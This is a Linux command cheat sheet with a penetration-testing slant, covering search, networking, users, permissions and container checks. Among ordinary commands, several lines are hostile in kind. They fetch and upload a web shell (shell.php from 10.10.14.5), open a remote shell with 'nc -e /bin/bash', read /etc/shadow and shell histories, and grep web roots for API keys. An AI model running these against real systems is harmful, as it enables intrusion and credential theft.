Linux Commands Cheat Sheet
#FILE OPERATIONS
# Note: 2>/dev/null hides errors such as "Permission denied", so each search
# only reports what the current user is able to read.
# Find files by name (case-insensitive)
find / -iname "*flag*" 2>/dev/null
# Find recently modified (last 10 min)
find / -mmin -10 -type f 2>/dev/null
# Find large files (>50MB)
find / -size +50M -type f 2>/dev/null
# Find files owned by user
find / -user www-data -type f 2>/dev/null
# Find directories writable by the current user
find / -writable -type d 2>/dev/null
# Find files with the SUID bit set (-perm -4000 matches any mode that includes it, e.g. 4755)
find / -perm -4000 -type f 2>/dev/null
# Find files with the SGID bit set (any mode that includes 2000, e.g. 2755)
find / -perm -2000 -type f 2>/dev/null
# Find world-writable files
find / -perm -o+w -type f 2>/dev/null
# grep recursive with context (-A 2 / -B 2 print two lines after / before each match)
grep -rn "password" . --include="*.txt" -A 2 -B 2
# Matching lines are printed in full, so the output itself can contain secrets
grep -rn "API_KEY\|SECRET\|token" /var/www 2>/dev/null
# grep invert match (exclude): drops any line containing "comment" or "#", plus empty lines
grep -v "comment\|#\|^$" file.txt
# sed in-place replace (overwrites the file; GNU sed's -i.bak keeps a backup copy)
sed -i 's/old/new/g' file.txt
# The dots in 127.0.0.1 are regex wildcards here; write 127\.0\.0\.1 to match only that address
sed -i 's/127.0.0.1/10.10.14.5/g' config.php
# awk print column (first field of each passwd entry; first and last field of each log line)
awk -F':' '{print $1}' /etc/passwd
awk '{print $1, $NF}' access.log
# cut by delimiter (/etc/shadow is normally readable only by root)
cut -d':' -f1 /etc/shadow
# sort + uniq counts (uniq -c only merges adjacent lines, hence the first sort)
cat access.log | sort | uniq -c | sort -rn
# wc line/word/char count
wc -l passwords.txt
# xargs: the first form splits file names on whitespace and breaks on names with spaces
find . -name "*.txt" | xargs grep "admin"
# NUL-delimited names are safe for any file name; -P4 runs up to four greps in parallel
find . -name "*.txt" -print0 | xargs -0 -P4 grep "admin"
#TEXT PROCESSING
# tr for char replacement / newline splitting
echo $PATH | tr ':' '\n'
cat file | tr -s '\n' # squeeze blank lines
cat file | tr '[:upper:]' '[:lower:]'
# diff two files
diff file1.txt file2.txt
# strings + filter (prints printable runs found in the binary, then keeps matching ones)
strings /usr/bin/binary | grep -i "password\|flag\|secret"
# base64 is an encoding, not encryption; echo -n keeps the trailing newline out of the encoded data
echo -n "text" | base64
echo "dGV4dA==" | base64 -d
# xxd hex dump
xxd file.bin | head
# head / tail
tail -f /var/log/apache2/access.log
head -n 20 largefile.txt
tail -n +5 file.txt # skip first 4 lines
# tee (write to file + stdout)
command | tee output.txt
# 2>&1 merges stderr into the pipe so error output is saved as well
command 2>&1 | tee output.txt
# jq JSON parsing (-r prints raw strings without JSON quotes)
curl -s http://target/api | jq '.users[] | .name'
cat data.json | jq -r '.[] | select(.enabled==true) | .id'
#PROCESS MANAGEMENT
# List all processes
ps aux
ps -ef
ps auxf # tree view
# Filter by name (the ps | grep form also lists the grep process itself; pgrep does not)
ps aux | grep apache
pgrep -a mysql
pgrep -u root
# top/htop (interactive)
top -u www-data
htop
# Background/foreground
Ctrl+Z # suspend
bg # resume in background
fg # bring to foreground
# kill signals
kill -l # list signals
# SIGKILL cannot be caught, so the process gets no chance to clean up; try SIGTERM first
kill -9 PID # SIGKILL
kill -15 PID # SIGTERM (graceful)
killall -9 process_name
pkill -u username # signals every process owned by that user (SIGTERM by default)
# jobs list
jobs -l
# Run in background
command &
nohup command & # survive shell exit
#NETWORK
# ss (socket stats, modern netstat)
# -p shows the owning process; without root it is normally filled in only for your own processes
ss -tlnp # TCP listening
ss -ulnp # UDP listening
ss -anp # all connections
# ip (modern ifconfig/route)
ip a # interfaces
ip r # routing table
ip neigh # ARP table
# curl
curl -s http://target # silent
curl -I http://target # headers only
# Credentials and cookies passed as arguments are visible in the process list and shell history,
# and travel unencrypted over plain http://
curl -X POST -d "user=admin&pass=test" http://target/login
curl -H "Cookie: session=abc" http://target/admin
curl -x http://proxy:8080 http://target
# -k skips TLS certificate verification, so the server's identity is not checked at all
curl -k https://target # ignore cert errors
curl -o file.bin http://target/file # download to file
curl --upload-file shell.php http://target/uploads/
# wget
wget http://10.10.14.5:8000/shell.php -O /tmp/shell.php
wget -r http://target # recursive mirror
# Netcat (nc)
nc -lvnp 4444 # listener
nc target 4444 -e /bin/bash # connect + exec (traditional)
nc -w 3 target 80 # connect with a 3-second timeout
nc -zv target 20-100 # port scan
nc -nvlp 4444 > received.txt # receive file
# DNS
host target.com
# Many servers answer ANY queries with a minimal response (RFC 8482), so the result may be incomplete
dig target.com ANY
dig -x 10.10.10.5 # reverse lookup
nslookup target.com
#USER / GROUP INFO
id # current user info
whoami # username
groups # groups for current user
groups username # groups for specific user
last # login history
who # logged-in users
w # logged-in users + activity
# Password files
# Hides accounts whose entry mentions nologin or false (typically service accounts)
cat /etc/passwd | grep -v "nologin\|false"
# /etc/shadow is normally readable only by root; the filter hides entries containing ! or *
# (locked accounts and accounts with no usable password)
cat /etc/shadow 2>/dev/null | grep -v "!\|\*"
# Sudo
sudo -l # list allowed commands
sudo -u username command # run as another user
sudo -i # interactive root shell
# su
su username
su - username # login shell (loads profile)
# History
# History files can hold credentials that were typed as command arguments; treat them as sensitive
history
cat ~/.bash_history
cat ~/.zsh_history
# sudo invocations are logged with a COMMAND= field; the log path varies by distribution
# (NOTE(review): /var/log/auth.log is the Debian/Ubuntu location - confirm for other systems)
cat /var/log/auth.log | grep "COMMAND"
#SERVICE MANAGEMENT
# systemctl
# "start|stop|restart" and "enable|disable" below are shorthand for "pick one";
# typed literally, the shell would treat | as a pipe
systemctl list-units --type=service
systemctl status apache2
systemctl start|stop|restart apache2
systemctl enable|disable apache2
systemctl list-timers
# service (SysVinit)
service apache2 status
service apache2 start|stop|restart
# Check running services (netstat comes from net-tools and may not be installed; ss is the replacement)
netstat -tlnp | head -20
ss -tlnp | head -20
# Cron jobs
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
crontab -l
crontab -u username -l
# Flags cron entries that fetch or open network connections; "nc" also matches
# unrelated words such as "sync" or "once", so expect false positives
grep -r "curl\|wget\|nc" /etc/cron* /var/spool/cron/ 2>/dev/null
# Process info
cat /proc/version
cat /proc/cpuinfo | head
cat /proc/meminfo | head
# Without root, the cwd link is normally readable only for your own processes
ls -la /proc/*/cwd 2>/dev/null # process working dirs
#ARCHIVES
# Before extracting an archive from an untrusted source, list its contents and check for
# absolute paths or ".." components that would write outside the target directory
# tar
tar -czf archive.tar.gz /path/to/files # create .tar.gz
tar -xf archive.tar # extract
tar -xzf archive.tar.gz # extract .tar.gz
tar -xjf archive.tar.bz2 # extract .tar.bz2
# zip / unzip
zip -r archive.zip /path
unzip archive.zip
unzip -l archive.zip # list contents
# A password given as an argument is visible in the process list and shell history;
# leave -P off to be prompted instead
unzip -P password archive.zip # with password
# gzip / gunzip
gzip file.txt # compresses to file.txt.gz
gunzip file.txt.gz
# 7z
7z a archive.7z /path
7z x archive.7z # extract with paths
7z l archive.7z # list contents
# Same exposure as unzip -P; a bare -p makes 7z prompt for the password
7z x archive.7z -psecret123 # with password
# cpio (-i extract, -d create directories, -m keep modification times, -v verbose)
cpio -idmv < archive.cpio
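#PERMISSIONS
# chmod
chmod 755 file # rwxr-xr-x
chmod 644 file # rw-r--r--
chmod +x script.sh # add execute
# SUID/SGID make a program run with its owner's/group's privileges; set them
# sparingly and audit them (see the find commands at the end of this section)
chmod u+s /path/binary # set SUID
chmod g+s /path/dir # set SGID
# Numeric table: r=4 w=2 x=1, sum per user/group/other
# 777 = rwxrwxrwx 755 = rwxr-xr-x
# 644 = rw-r--r-- 600 = rw-------
# 4000 = SUID 2000 = SGID 1000 = sticky
# chown
chown user:group file
chown -R user:group /path
# ACL
getfacl file
setfacl -m u:username:rwx file
setfacl -m g:groupname:r-- file
setfacl -b file # remove all ACLs
# World access and special bits
# The ls -l mode string is 10 characters: type, then rwx for user, group, other.
# "Other read" is the 8th character (7 dots before it), "other write" the 9th (8 dots).
ls -la | grep "^.......r" # world-readable
ls -la | grep "^........w" # world-writable
find / -perm -4000 -ls 2>/dev/null # SUID files with details
find / -perm -2 -type f 2>/dev/null # writable by others (world-writable)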
#ADVANCED SEARCH EXAMPLES
# SUID binaries (4 variants)
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null # symbolic form of -4000
find / -type f -perm -4000 -exec ls -la {} \; 2>/dev/null # with owner, mode and size
find / -perm -4000 -user root -not -path "/usr/share/*" 2>/dev/null # root-owned, skipping /usr/share
# SGID
find / -perm -2000 -type f 2>/dev/null
# World-writable files
find / -perm -o+w -type f 2>/dev/null
find / -perm -2 ! -type l -ls 2>/dev/null # anything world-writable except symlinks, with details
# Writable directories
find / -type d -writable 2>/dev/null
# Files whose owner UID or group GID has no matching account or group (orphaned)
find / -nouser -o -nogroup 2>/dev/null
# Find by group ownership
find / -group adm -type f 2>/dev/null
# Find by size
find / -size +10M -size -100M -type f 2>/dev/null
find / -size +0c -type f 2>/dev/null # non-empty files
# Find by time
find / -mtime -1 -type f 2>/dev/null # modified within 24h
find / -atime -7 -type f 2>/dev/null # accessed within 7 days
find / -ctime +30 -type f 2>/dev/null # inode status (mode, owner, content) changed over 30 days ago
# Find by type (no 2>/dev/null here, so permission errors are printed too)
find / -type f # regular file
find / -type d # directory
find / -type l # symlink
find / -type b -o -type c # block/character device
# Combine: both SUID and SGID set (both -perm tests must match)
find / -perm -4000 -perm -2000 -type f 2>/dev/null
#BASH SHORTCUTS
# History expansions (!!, !$, !*, !grep) run as soon as Enter is pressed;
# "shopt -s histverify" makes bash show the expanded line for review first
!! # repeat last command
!$ # last argument of previous command
!* # all arguments of previous command
!grep # last command starting with "grep"
Ctrl+R # reverse search history
Ctrl+A / Ctrl+E # jump to start/end of line
Ctrl+W # delete word backward
Ctrl+U # delete to start of line
Ctrl+L # clear screen
Alt+. # insert last argument
#CAPABILITY SCANNING
# Capability scanning
# File capabilities grant a binary selected root privileges without SUID; audit them like SUID files
getcap -r / 2>/dev/null # Find all files with capabilities
capsh --print # Print current process capabilities
# Docker/container escape checks
docker ps # List running containers
# Membership of the docker group gives control of the Docker daemon, which runs as root;
# treat it as a privileged group
id | grep docker # Check if user is in docker group
# NOTE(review): on cgroup v2 hosts this file may show only "0::/" inside a container,
# so an empty result does not prove the host is not a container - confirm another way
cat /proc/1/cgroup 2>/dev/null | grep -E 'docker|kubepods' # Check if inside container
# Service and log analysis
systemd-analyze blame # List units ordered by how long they took to initialize
# NOTE(review): the unit may be named sshd rather than ssh on some distributions - confirm
journalctl -u ssh -n 50 --no-pager # Last 50 SSH journal entries
journalctl -u cron -n 50 --no-pager # Last 50 cron entries